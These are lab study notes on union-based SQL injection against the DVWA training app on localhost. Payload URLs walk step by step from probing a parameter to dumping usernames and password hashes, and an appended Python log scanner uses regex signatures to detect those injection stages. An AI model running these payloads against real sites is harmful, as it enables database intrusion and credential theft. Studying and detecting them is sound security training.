Injection
=========

Basic SQL Injection -> Authentication Bypass

Union Based Injection ->
=====================

Technology -> PHP
Database -> MySQL

Entering an arbitrary or unwanted SQL string from the front end of the website and fetching data from the database, i.e. the back end.

All queries are tried in the URL of the website.

Steps to do penetration testing using: UNION BASED SQL INJECTION

Target -> Get access to the complete database

Database -> Collection of Tables -> Collection of Columns -> Collection of Data

DVWA -> LOW LEVEL

Step 1: Find a GET method in the website

In the URL:

?id=4
?pid=8
?username=palvinder
?product=chips

?something=something

By clicking every possible link available on the website
By trying every option on the website, e.g. Search, Submit, Comment, etc.

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=4&Submit=Submit#

Step 2: Check exception handling, or check whether the website is vulnerable or not

?id=4'

The website shows an error (MySQL, missing images, corrupt content, video errors)

Any change in the website: the site is vulnerable

Step 3: Check the number of columns

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=4' order by 1--+&Submit=Submit#

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=4' order by 2--+&Submit=Submit#

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=4' order by 3--+&Submit=Submit# ====>>>> Error

Columns = 2

Step 4: Select all columns

select 1,2--+

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=4' union select 1,2--+&Submit=Submit#

==>> This shows all the vulnerable columns, from which we can get data from the database

Random = 1, 2, or both

Those column numbers are vulnerable

Step 5: Getting the name of the database:

database()

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=4' union select database(),2--+&Submit=Submit#

Name of Database = dvwa

Step 6: Version of the database

version()

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=4' union select version(),2--+&Submit=Submit#

Step 7: Get the table names

select 1,2--+

select table_name,2 from information_schema.tables--+

information_schema = Mother of the database

Knowledge of the complete database

Tables = information_schema.tables

Columns = information_schema.columns

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=4' union select table_name,2 from information_schema.tables--+&Submit=Submit#

List of all tables from the database :)

We have to choose those table names -> Sensitive Information

E.g.:

credit
debit
password
login
users
credentials

Table Name = users

Step 8: We have to get the column names of the "users" table

select column_name,2 from information_schema.columns where table_name="users"--+

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=4' union select column_name,2 from information_schema.columns where table_name="users"--+&Submit=Submit#

==> List of all columns of the "users" table

Column Names = user and password

Step 9: Data from the respective columns of the particular table

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=4' union select user,password from users--+&Submit=Submit#

username = Getting in brain (readable)

password = flying over the brain (hashed)

MD5 hash =

Hexadecimal (0-9, a-f)

32 characters
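
A detection-side view of the probes in Steps 2 to 9, as an added example that is not part of the original notes: it decodes the query string of each access-log request and labels which stage of the walkthrough a parameter value matches. The combined log format, the client addresses, the timestamps and the stage names are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Signatures for the probes in Steps 2-9 of these notes, most specific first.
STAGES = [
    ("schema_enum", re.compile(r"information_schema\.(tables|columns)", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("column_count", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("quote_probe", re.compile(r"^[\w.-]*'$")),
]
# Client IP and request target from a combined-log-format line (assumed format).
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(value):
    """Return the first stage whose signature matches a decoded parameter value."""
    for name, pattern in STAGES:
        if pattern.search(value):
            return name
    return None

def scan(lines):
    """Map client IP -> ordered list of (parameter, stage) hits."""
    hits = {}
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        # parse_qsl percent-decodes values and turns '+' into a space.
        for param, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            stage = classify(value)
            if stage:
                hits.setdefault(client, []).append((param, stage))
    return hits

# Constructed sample lines (hypothetical clients and timestamps, not real traffic).
_TS = '- - [01/Jan/2024:10:00:0{} +0000] "GET /dvwa/vulnerabilities/sqli/?id={}&Submit=Submit HTTP/1.1" 200 1500'
SAMPLE_LOG = [
    "10.0.0.5 " + _TS.format(0, "4"),
    "10.0.0.7 " + _TS.format(1, "4%27"),
    "10.0.0.7 " + _TS.format(2, "4%27%20order%20by%203--+"),
    "10.0.0.7 " + _TS.format(3, "4%27%20union%20select%20table_name,2%20from%20information_schema.tables--+"),
    "10.0.0.7 " + _TS.format(4, "4%27%20union%20select%20user,password%20from%20users--+"),
]

if __name__ == "__main__":
    for client, found in scan(SAMPLE_LOG).items():
        print(client, [stage for _, stage in found])
```

These signatures only match the unobfuscated strings used in these notes; the fix for the underlying flaw is a parameterized query in the application.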